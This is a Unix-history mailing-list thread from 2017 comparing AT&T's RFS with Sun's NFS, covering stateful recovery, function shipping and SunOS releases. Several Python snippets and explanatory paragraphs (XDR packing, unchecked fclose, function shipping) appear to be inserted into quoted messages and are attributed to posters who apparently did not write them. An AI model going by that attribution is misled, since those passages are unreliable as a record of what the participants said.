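# RFS-style binary structs, by contrast, ship the host's native layout:
def native_pack_int(value):
    return struct.pack("=i", value)          # whatever this host uses

wire = xdr_pack_int(1994)
assert xdr_unpack_int(wire) == 1994
assert wire == b"\x00\x00\x07\xca"           # same bytes on every host
```

On a little-endian machine `native_pack_int(1994)` produces the bytes reversed, which is exactly why binary-over-the-wire protocols break down in a mixed-architecture shop.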

It's important to note, when talking about NFS, that there was Sun's NFS
and everyone else's NFS.  Sun ran their entire company on NFS.  /usr/dist
was where all the software that was not part of SunOS lived, it was an
NFS mounted volume (that was replicated to each subnet).  It was heavily
used as were a lot of other things.  The automounter at Sun just worked,
wanted to see your buddies stuff?  You just cd-ed to it and it worked.

Much like mmap, NFS did not export well to other companies.  When I went
to SGI I actually had a principal engineer (like Sun's distinguished
engineer) tell me "nobody trusts NFS, use rcp if you care about your
data".  What.  The.  Fuck.  At Sun, NFS just worked.  All the time.
The idea that it would not work was unthinkable and if it ever did
not work it got fixed right away.

Other companies, it was a checkbox thing, it sorta worked.  That was
an eye opener for me.  mmap was the same way, Sun got it right and 
other companies sort of did.


On Wed, Sep 27, 2017 at 04:13:07PM -0700, Kevin Bowling wrote:
> I guess alternatively, what was interesting or neat, about RFS, if
> anything?  And what was bad?
> 
> On Wed, Sep 27, 2017 at 4:11 PM, Clem Cole <clemc at ccc.com> wrote:
> >
> >
> > On Wed, Sep 27, 2017 at 7:01 PM, Kevin Bowling <kevin.bowling at kev009.com>
> > wrote:
> >>
> >>
> >> What were the market forces or limitations that led to NFS prevailing?
> >
> > Sun pretty much gave it away.   It was simple and 'good enough.'
> >
> > The issue was it was not a real UNIX file system and did not support full
> > UNIX semantics.   For a lot of things (like program development) that was
> > usually ok.  It also exposed a lot of issues in user code - things like
> > programs that never bothered to check for error returns (like fclose).
> >
> > So bad things happened for a long time in a lot of code (silent holes in
> > your SCCS files that didn't get detected until months later).
> >
> > But to Sun and NFS's credit, it solved a problem that was there and was
> > cheap and so folks used it.
> >
> > Clem

-- 
---
Larry McVoy            	     lm at mcvoy.com             http://www.mcvoy.com/lm 



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27 23:11                     ` Clem Cole
@ 2017-09-27 23:13                       ` Kevin Bowling
  2017-09-28  0:39                         ` Larry McVoy
                                           ` (2 more replies)
  0 siblings, 3 replies; 48+ messages in thread
From: Kevin Bowling @ 2017-09-27 23:13 UTC (permalink / raw)


I guess alternatively, what was interesting or neat, about RFS, if
anything?  And what was bad?

On Wed, Sep 27, 2017 at 4:11 PM, Clem Cole <clemc at ccc.com> wrote:
>
>
> On Wed, Sep 27, 2017 at 7:01 PM, Kevin Bowling <kevin.bowling at kev009.com>
> wrote:
>>
>>
>> What were the market forces or limitations that led to NFS prevailing?
>
> Sun pretty much gave it away.   It was simple and 'good enough.'
>
> The issue was it was not a real UNIX file system and did not support full
> UNIX semantics.   For a lot of things (like program development) that was
> usually ok.  It also exposed a lot of issues in user code - things like
> programs that never bothered to check for error returns (like fclose).
>
> So bad things happened for a long time in a lot of code (silent holes in
> your SCCS files that didn't get detected until months later).
>
> But to Sun and NFS's credit, it solved a problem that was there and was
> cheap and so folks used it.
>
> Clem



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27 23:01                   ` Kevin Bowling
@ 2017-09-27 23:11                     ` Clem Cole
  2017-09-27 23:13                       ` Kevin Bowling
  0 siblings, 1 reply; 48+ messages in thread
From: Clem Cole @ 2017-09-27 23:11 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 925 bytes --]

On Wed, Sep 27, 2017 at 7:01 PM, Kevin Bowling <kevin.bowling at kev009.com>
wrote:

>
> What were the market forces or limitations that led to NFS prevailing?
>
​Sun pretty much gave it away.   It was simple and 'good enough.'

The issue was it was not a real UNIX file system and did not support full
UNIX semantics.   For a lot of things (like program development) that was
usually ok.  It also exposed a lot of issues in user code - things like
programs that never bothered to check for error returns (like fclose).

So bad things happened for a long time in a lot of code (silent holes in
your SCCS files that didn't get detected until months later).
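The fclose failure mode works like this: with a remote file system, a write can appear to succeed while the data only sits in a local buffer, and the server's error surfaces when the buffer is flushed at close time -- so code that never checks the close result loses data silently. A simulated toy, not a real NFS client:

```python
# Sketch of the unchecked-fclose hazard.  The "server failure" here is
# simulated; real NFS clients report it via fclose(3)'s return value.
class RemoteFile:
    def __init__(self, server_ok=True):
        self.buffer = []
        self.server_ok = server_ok

    def write(self, data):
        self.buffer.append(data)   # buffered locally; always "succeeds"

    def close(self):               # the flush happens here, like fclose
        if not self.server_ok:
            raise OSError("server rejected the flushed writes")

f = RemoteFile(server_ok=False)
f.write(b"precious SCCS delta")    # appears to work fine

try:
    f.close()                      # the error finally surfaces here
    saved = True
except OSError:
    saved = False                  # careful code notices; careless code
                                   # never looks and silently loses data

assert saved is False
```

Code that ignores the close result (the moral equivalent of `fclose(fp);` with no check in C) is exactly how those silent holes ended up in SCCS files.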

But to Sun and NFS's credit, it solved a problem that was there and was
cheap and so folks used it.

Clem
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170927/ae718e15/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27  8:44                 ` arnold
  2017-09-27 15:25                   ` Arthur Krewat
  2017-09-27 17:38                   ` Mantas Mikulėnas
@ 2017-09-27 23:01                   ` Kevin Bowling
  2017-09-27 23:11                     ` Clem Cole
  2 siblings, 1 reply; 48+ messages in thread
From: Kevin Bowling @ 2017-09-27 23:01 UTC (permalink / raw)


RFS was long out by the time I started using *nix.  I do have media
for it for the 3B2s in my computer collection though.

What were the market forces or limitations that led to NFS prevailing?

Regards,

On Wed, Sep 27, 2017 at 1:44 AM,  <arnold at skeeve.com> wrote:
> Clem Cole <clemc at ccc.com> wrote:
>
>> On Sun, Sep 24, 2017 at 1:51 PM, Arthur Krewat <krewat at kilonet.net> wrote:
>>
>> > Where does RFS (AT&T System III) fit in all of this?
>> >
>> Well it was not in PWB 3.0 - aka System III.
>
> It was in System V Release 3, thus the confusion.  Sun integrated it
> into SunOS 4.0 (IIRC) and then pulled it out around 4.1.something. It
> was for sure gone from 4.1.3 and 4.1.4.
>
>> > Just looking for history on RFS if any.
>> >
>> David Arnovitz's work -- Dave worked for us at Masscomp in Atlanta
>> afterwards.
>
> Interesting!  I never knew that he was involved with it. I don't think
> his name was on any of the USENIX papers.
>
> He and I grew up on the same street, and both sets of parents still
> live there.  He later (with Perry Flinn) went on to found Secureware
> and they did quite well for themselves in the 90s.
>
>> RFS was based on ideas Peter had used in Eighth Edition file system.  When
>> we did EFS @ Masscomp, Perry Flinn and I were both aware of Peter's work ...
>
> I briefly overlapped Perry at Georgia Tech. He was one of the three
> major developers of the Georgia Tech Software Tools Subsystem for Pr1me
> Computers that I later was involved with.  A very bright guy; no idea
> where he is now.
>
> Arnold
>



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27  8:44                 ` arnold
  2017-09-27 15:25                   ` Arthur Krewat
@ 2017-09-27 17:38                   ` Mantas Mikulėnas
  2017-09-27 23:01                   ` Kevin Bowling
  2 siblings, 0 replies; 48+ messages in thread
From: Mantas Mikulėnas @ 2017-09-27 17:38 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1026 bytes --]

On Wed, Sep 27, 2017 at 11:44 AM, <arnold at skeeve.com> wrote:

> Clem Cole <clemc at ccc.com> wrote:
>
> > On Sun, Sep 24, 2017 at 1:51 PM, Arthur Krewat <krewat at kilonet.net>
> wrote:
> >
> > > Where does RFS (AT&T System III) fit in all of this?
> > >
> > Well it was not in PWB 3.0 - aka System III.
>
> It was in System V Release 3, thus the confusion.  Sun integrated it
> into SunOS 4.0 (IIRC) and then pulled it out around 4.1.something. It
> was for sure gone from 4.1.3 and 4.1.4.
>

...and to this day, even the Linux errno.h carries such gems as EDOTDOT,
described as "RFS specific error"...

Speaking of which, I've been meaning to ask – what was the original meaning
of such errnos as EL2HLT or ENOANO? (And, well, the remaining few dozen of
them?) I've figured out a few, but gave up on some.

-- 
Mantas Mikulėnas <grawity at gmail.com>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170927/474133e0/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27 15:25                   ` Arthur Krewat
@ 2017-09-27 15:49                     ` arnold
  0 siblings, 0 replies; 48+ messages in thread
From: arnold @ 2017-09-27 15:49 UTC (permalink / raw)


Arthur Krewat <krewat at kilonet.net> wrote:

> On 9/27/2017 4:44 AM, arnold at skeeve.com wrote:
> > It was in System V Release 3, thus the confusion.  Sun integrated it
> > into SunOS 4.0 (IIRC) and then pulled it out around 4.1.something. It
> > was for sure gone from 4.1.3 and 4.1.4.
>
> Not true, sorry ;)

You're right. It was in some version of SunOS 5.x (Solaris 2.x) that they dropped it.

It was so looooong ago ...

Thanks,

Arnold



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27  8:44                 ` arnold
@ 2017-09-27 15:25                   ` Arthur Krewat
  2017-09-27 15:49                     ` arnold
  2017-09-27 17:38                   ` Mantas Mikulėnas
  2017-09-27 23:01                   ` Kevin Bowling
  2 siblings, 1 reply; 48+ messages in thread
From: Arthur Krewat @ 2017-09-27 15:25 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1743 bytes --]



On 9/27/2017 4:44 AM, arnold at skeeve.com wrote:
> Clem Cole <clemc at ccc.com> wrote:
>
>>
>> Well it was not in PWB 3.0 - aka System III.
> It was in System V Release 3, thus the confusion.  Sun integrated it
> into SunOS 4.0 (IIRC) and then pulled it out around 4.1.something. It
> was for sure gone from 4.1.3 and 4.1.4.
>

Not true, sorry ;) The host irises was my SunOS machine that I used for 
USENET news because it had a 1GB SCSI disk on it. The host kilowatt was 
the modem front-end for my BBS and did all the UUCP processing. I was 
...!mcdhup!kilowatt in the early 90's.

RFS was included with SunOS 4.1.3 that I installed on irises. See below, 
motd shows SunOS release, and /usr/etc/mount* are all dated the same 
day, so it was installed from the SunOS 4.1.3 distribution at the time 
of initial install.

 From my archives:

medusa# pwd
/export/archive/tapes/irises.3/a2
medusa# cat etc/motd
SunOS Release 4.1.3 (IRISES) #4: Sun Mar 6 15:14:38 EST 1994

This is irises, a sister to kilowatt. It is a Sun Sparc IPC. I hope to
move to this platform in the near future, but for now, it has to be a
conglomerate.

medusa# ls -l usr/etc/mount*
-rwxr-xr-x   1 root     staff     163840 Jul 23  1992 usr/etc/mount
-rwxr-xr-x   1 root     staff      16384 Jul 23  1992 usr/etc/mount_hsfs
-rwxr-xr-x   1 root     staff      16384 Jul 23  1992 usr/etc/mount_lo
-rwxr-xr-x   1 root     staff      16384 Jul 23  1992 usr/etc/mount_pcfs
-rwxr-xr-x   1 root     staff      65814 Jul 23  1992 usr/etc/mount_rfs
-rwxr-xr-x   1 root     staff      57344 Jul 23  1992 usr/etc/mount_tfs
-rwxr-xr-x   1 root     staff      16384 Jul 23  1992 usr/etc/mount_tmp



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-24 19:54               ` Clem Cole
  2017-09-24 21:59                 ` Arthur Krewat
  2017-09-24 22:08                 ` Arthur Krewat
@ 2017-09-27  8:44                 ` arnold
  2017-09-27 15:25                   ` Arthur Krewat
                                     ` (2 more replies)
  2 siblings, 3 replies; 48+ messages in thread
From: arnold @ 2017-09-27  8:44 UTC (permalink / raw)


Clem Cole <clemc at ccc.com> wrote:

> On Sun, Sep 24, 2017 at 1:51 PM, Arthur Krewat <krewat at kilonet.net> wrote:
>
> > Where does RFS (AT&T System III) fit in all of this?
> >
> Well it was not in PWB 3.0 - aka System III.

It was in System V Release 3, thus the confusion.  Sun integrated it
into SunOS 4.0 (IIRC) and then pulled it out around 4.1.something. It
was for sure gone from 4.1.3 and 4.1.4.

> > Just looking for history on RFS if any.
> >
> David Arnovitz's work -- Dave worked for us at Masscomp in Atlanta
> afterwards.

Interesting!  I never knew that he was involved with it. I don't think
his name was on any of the USENIX papers.

He and I grew up on the same street, and both sets of parents still
live there.  He later (with Perry Flinn) went on to found Secureware
and they did quite well for themselves in the 90s.

> RFS was based on ideas Peter had used in Eighth Edition file system.  When
> we did EFS @ Masscomp, Perry Flinn and I were both aware of Peter's work ...

I briefly overlapped Perry at Georgia Tech. He was one of the three
major developers of the Georgia Tech Software Tools Subsystem for Pr1me
Computers that I later was involved with.  A very bright guy; no idea
where he is now.

Arnold



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-24 22:08                 ` Arthur Krewat
@ 2017-09-24 23:52                   ` Clem Cole
  0 siblings, 0 replies; 48+ messages in thread
From: Clem Cole @ 2017-09-24 23:52 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 491 bytes --]

On Sun, Sep 24, 2017 at 6:08 PM, Arthur Krewat <krewat at kilonet.net> wrote:

> Also, Clem, when you say "function shipping" - that sounds like RPC.
>

Similar -- I think of function shipping as the technique of sending
computation to the data rather than marshalling the data together and
bringing it to the computation.
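The distinction can be shown in miniature: instead of pulling the remote data across the wire and computing locally, the client ships the operation to the node that holds the data and gets back just the answer. A toy illustration, not RFS's actual protocol:

```python
# Function shipping vs. data shipping, in miniature.
# (Toy illustration only; the names here are made up.)
class DataNode:
    def __init__(self, blocks):
        self.blocks = blocks                 # the data lives here

    def run(self, func):                     # function shipping:
        return func(self.blocks)             # compute where the data is

node = DataNode([b"a" * 4096, b"b" * 4096])

# Data shipping would move 8 KB over the wire; function shipping moves
# only a small request and a small answer.
total = node.run(lambda blocks: sum(len(b) for b in blocks))
assert total == 8192
```

RPC is the transport mechanism; function shipping is the design decision about *what* you send over it.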
 ​
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170924/a0765107/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-24 19:54               ` Clem Cole
  2017-09-24 21:59                 ` Arthur Krewat
@ 2017-09-24 22:08                 ` Arthur Krewat
  2017-09-24 23:52                   ` Clem Cole
  2017-09-27  8:44                 ` arnold
  2 siblings, 1 reply; 48+ messages in thread
From: Arthur Krewat @ 2017-09-24 22:08 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 3077 bytes --]

Also, Clem, when you say "function shipping" - that sounds like RPC.



On 9/24/2017 3:54 PM, Clem Cole wrote:
>
>
> On Sun, Sep 24, 2017 at 1:51 PM, Arthur Krewat <krewat at kilonet.net 
> <mailto:krewat at kilonet.net>> wrote:
>
>     Where does RFS (AT&T System III) fit in all of this?
>
> ​Well it was not in PWB 3.0 - aka System ​III.
>
>
>
>     ​....
>
>
>     Just looking for history on RFS if any.
>
> David Arnovitz's work -- Dave worked for us at Masscomp in Atlanta​ 
> afterwards.  IIRC Summit pushed it out via System V, it was not part 
> of System III (David did not even work for BTL when System II was 
> released).
>
> RFS was based on ideas Peter had used in Eighth Edition file system. 
> When we did EFS @ Masscomp, Perry Flinn and I were both aware of 
> Peter's work (I had talked to him a few times).  As we finished it, we 
> hired Dave in Atlanta, and he told us a little about RFS although 
> it had not yet been released.   If you look, my EFS paper was the 
> alternate paper given against Rusty's when the NFS paper was published 
> [difference: Masscomp would not give away EFS - different story].
>
> Anyway, Dave's RFS used Peter's file system switch that was in 
> Eighth Edition.  I used something similar for EFS, which was not as 
> clean as Steve Kleiman's VFS layer, which I think Sun did right.   But 
> NFS got the whole stateless thing wrong, which I was pleased over the 
> years to see I was right about (the whole point of the EFS paper was 
> that if it's a real UNIX file system, then there will be shared state, 
> and the question is how do you recover from an error).
>
> RFS, EFS and Weinberger's FS all did stateful recovery.  RFS used a 
> function ship model IIRC.  I did not get to look at the code until 
> long after it was released so I never studied it in detail and I never 
> ran it.   But he had Peter's work available to him, so I suspect there 
> is a lot of common ideas.  I think Peter used function shipping also.   
>  [EFS did not; it was more ad hoc as to what we shipped and what we did 
> not.   That was a performance thing for us, as we had Apollo down the 
> street and were very, very concerned with what Aegis/Domain could do.]
>
> That said, NFS had a really simple model, which (in practice) was good 
> enough for many things and more importantly, Sun gave the code away 
> and made it a standard.  So the old less is more; Christensen 
> disruption theory of technology came through.
>
> Masscomp (and Apollo with Domain) both had 'better' distributed file 
> systems, but 'lost' because (like DEC, where many of their people - 
> particularly in marketing - came from) they did not get it.   They tried 
> to keep it closed like VMS et al... and it ultimately died.  NFS was 
> 'free' and did the job.   What was there not to like?
>
> In hindsight, I wish I could have understood that then.  Kudos to 
> Kleiman for what he did!
>
> Clem

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170924/9243054a/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-24 19:54               ` Clem Cole
@ 2017-09-24 21:59                 ` Arthur Krewat
  2017-09-24 22:08                 ` Arthur Krewat
  2017-09-27  8:44                 ` arnold
  2 siblings, 0 replies; 48+ messages in thread
From: Arthur Krewat @ 2017-09-24 21:59 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 564 bytes --]



On 9/24/2017 3:54 PM, Clem Cole wrote:
>
>
> On Sun, Sep 24, 2017 at 1:51 PM, Arthur Krewat <krewat at kilonet.net 
> <mailto:krewat at kilonet.net>> wrote:
>
>     Where does RFS (AT&T System III) fit in all of this?
>
> ​Well it was not in PWB 3.0 - aka System ​III.
>

Sorry, Clem, it was System V R3 - I read this, and then misspoke: 
https://en.wikipedia.org/wiki/Remote_File_Sharing


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170924/defe4bce/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-24 17:51             ` [TUHS] RFS was: " Arthur Krewat
@ 2017-09-24 19:54               ` Clem Cole
  2017-09-24 21:59                 ` Arthur Krewat
                                   ` (2 more replies)
  0 siblings, 3 replies; 48+ messages in thread
From: Clem Cole @ 2017-09-24 19:54 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 2784 bytes --]

On Sun, Sep 24, 2017 at 1:51 PM, Arthur Krewat <krewat at kilonet.net> wrote:

> Where does RFS (AT&T System III) fit in all of this?
>
​Well it was not in PWB 3.0 - aka System ​III.




>
> ​....
>
>
> Just looking for history on RFS if any.
>
David Arnovitz's work -- Dave worked for us at Masscomp in Atlanta​
afterwards.  IIRC Summit pushed it out via System V, it was not part of
System III (David did not even work for BTL when System II was released).

RFS was based on ideas Peter had used in Eighth Edition file system.  When
we did EFS @ Masscomp, Perry Flinn and I were both aware of Peter's work (I
had talked to him a few times).  As we finished it, we hired Dave in
Atlanta and told me about us a little about RFS although it had not yet
been released.   If you look, my EFS paper was the alternate paper given
against Rusty's when the NFS paper published - difference - Masscomp would
not give away EFS - different story].

Anyway, Dave's RFS used Peter's file system switch that was in
Eighth Edition.  I used something similar for EFS, which was not as clean
as Steve Kleiman's VFS layer, which I think Sun did right.   But NFS got
the whole stateless thing wrong, which I was pleased over the years to see I
was right about (the whole point of the EFS paper was that if it's a real
UNIX file system, then there will be shared state, and the question is how
do you recover from an error).

RFS, EFS and Weinberger's FS all did stateful recovery.  RFS used a
function ship model IIRC.  I did not get to look at the code until long
after it was released so I never studied it in detail and I never ran it.
But he had Peter's work available to him, so I suspect there is a lot of
common ideas.  I think Peter used function shipping also.    [EFS did not;
it was more ad hoc as to what we shipped and what we did not.   That was a
performance thing for us, as we had Apollo down the street and were very,
very concerned with what Aegis/Domain could do.]

That said, NFS had a really simple model, which (in practice) was good
enough for many things and more importantly, Sun gave the code away and
made it a standard.  So the old less is more; Christensen disruption theory
of technology came through.

Masscomp (and Apollo with Domain) both had 'better' distributed file
systems, but 'lost' because (like DEC, where many of their people -
particularly in marketing - came from) they did not get it.   They tried to
keep it closed like VMS et al... and it ultimately died.  NFS was 'free' and
did the job.   What was there not to like?

In hindsight, I wish I could have understood that then.  Kudos to Kleiman
for what he did!

Clem
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170924/b59b4cb6/attachment-0001.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re:  UNIX of choice these days?
  2017-09-24 17:33           ` Clem Cole
@ 2017-09-24 17:51             ` Arthur Krewat
  2017-09-24 19:54               ` Clem Cole
  0 siblings, 1 reply; 48+ messages in thread
From: Arthur Krewat @ 2017-09-24 17:51 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1835 bytes --]

Where does RFS (AT&T System III) fit in all of this?

I used it for a while between a SunOS 4.1.3 box and a PC running AT&T 
SVR4.2 (Consensys) because the client-side NFS was buggy on the SVR4.2 
side. This was in the days when I ran a UUCP node (kilowatt) in the 
early 90's and needed access from the PC to the "large" (5.25" FH 1GB) 
disk on the SunOS machine. It worked, that I can say.

Eventually, I swapped it around after getting an Adaptec SCSI controller 
for the PC - turned out the server-side NFS on this particular SVR4.2 
was fine.

Just looking for history on RFS if any.

thanks!

On 9/24/2017 1:33 PM, Clem Cole wrote:
>
> To me, the really important thing SMI did by giving away NFS was to 
> start the FS layering argument.   What we ended up with is not perfect, 
> it's a compromise (I wish the stacking model was better), but we 
> started to have the discussion.   But because of NFS, we ended up 
> getting a lot of different file system options, which previously we 
> did not have.   It made us really think through what were 'meta' 
> functions that were FS independent, 'virtual' functions that span all 
> FS implementations, and what were 'physical' (implementation) specific 
> file system functions.
>
> NFS really should be credited for forcing that clean up.
>
> Similarly, a few of us tried (and failed) to have the process layer 
> discussion -- consider the Locus vprocs work.   It's really too bad 
> we don't have that layer in any of the UNIX kernels today; it really 
> makes process control, migration, etc. a lot cleaner, just as adding a 
> file system layer did.
>
> But that's a war, I fought and lost....
>
>
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170924/feb02688/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

end of thread, other threads:[~2017-09-29 22:21 UTC | newest]

Thread overview: 48+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2017-09-28 12:53 [TUHS] RFS was: Re: UNIX of choice these days? Noel Chiappa
2017-09-28 14:09 ` Theodore Ts'o
2017-09-28 14:35   ` Clem Cole
     [not found] <mailman.1219.1506559196.3779.tuhs@minnie.tuhs.org>
2017-09-28 14:08 ` David
2017-09-28 17:22   ` Pete Wright
  -- strict thread matches above, loose matches on Subject: below --
2017-09-20  0:12 [TUHS] " Arthur Krewat
2017-09-20  0:39 ` Dave Horsfall
2017-09-23  9:17   ` Dario Niedermann
2017-09-23  9:36     ` Steve Mynott
2017-09-24 13:46       ` Andy Kosela
2017-09-24 14:02         ` ron minnich
2017-09-24 17:33           ` Clem Cole
2017-09-24 17:51             ` [TUHS] RFS was: " Arthur Krewat
2017-09-24 19:54               ` Clem Cole
2017-09-24 21:59                 ` Arthur Krewat
2017-09-24 22:08                 ` Arthur Krewat
2017-09-24 23:52                   ` Clem Cole
2017-09-27  8:44                 ` arnold
2017-09-27 15:25                   ` Arthur Krewat
2017-09-27 15:49                     ` arnold
2017-09-27 17:38                   ` Mantas Mikulėnas
2017-09-27 23:01                   ` Kevin Bowling
2017-09-27 23:11                     ` Clem Cole
2017-09-27 23:13                       ` Kevin Bowling
2017-09-28  0:39                         ` Larry McVoy
2017-09-28  3:19                           ` Theodore Ts'o
2017-09-28 13:45                             ` Larry McVoy
2017-09-28 17:12                               ` Steve Johnson
2017-09-28  0:54                         ` Dave Horsfall
2017-09-28  0:59                           ` William Pechter
2017-09-28 13:49                         ` arnold
2017-09-28 14:07                           ` Larry McVoy
2017-09-28 14:28                             ` arnold
2017-09-28 19:49                               ` Larry McVoy
2017-09-28 20:00                             ` Bakul Shah
2017-09-28 14:27                           ` Clem Cole
2017-09-28 22:08                             ` Dave Horsfall
2017-09-28 22:20                               ` Larry McVoy
2017-09-29  2:23                                 ` Kevin Bowling
2017-09-29  8:59                                 ` Andreas Kusalananda Kähäri
2017-09-29 14:20                                   ` Clem Cole
2017-09-29 16:46                                   ` Grant Taylor
2017-09-29 17:02                                     ` Kurt H Maier
2017-09-29 17:27                                       ` Pete Wright
2017-09-29 18:11                                       ` Grant Taylor
2017-09-29 18:47                                     ` Andreas Kusalananda Kähäri
2017-09-29 15:22                                 ` George Ross
2017-09-29 18:40                                   ` Don Hopkins
2017-09-29 19:03                                     ` Larry McVoy
2017-09-29 21:24                                     ` Arthur Krewat
2017-09-29 22:11                                       ` Don Hopkins
2017-09-29 22:21                                         ` Don Hopkins
2017-09-29 19:19                                 ` Dan Cross
2017-09-29 19:22                                   ` Larry McVoy
2017-09-29 20:52                                   ` Jon Forrest
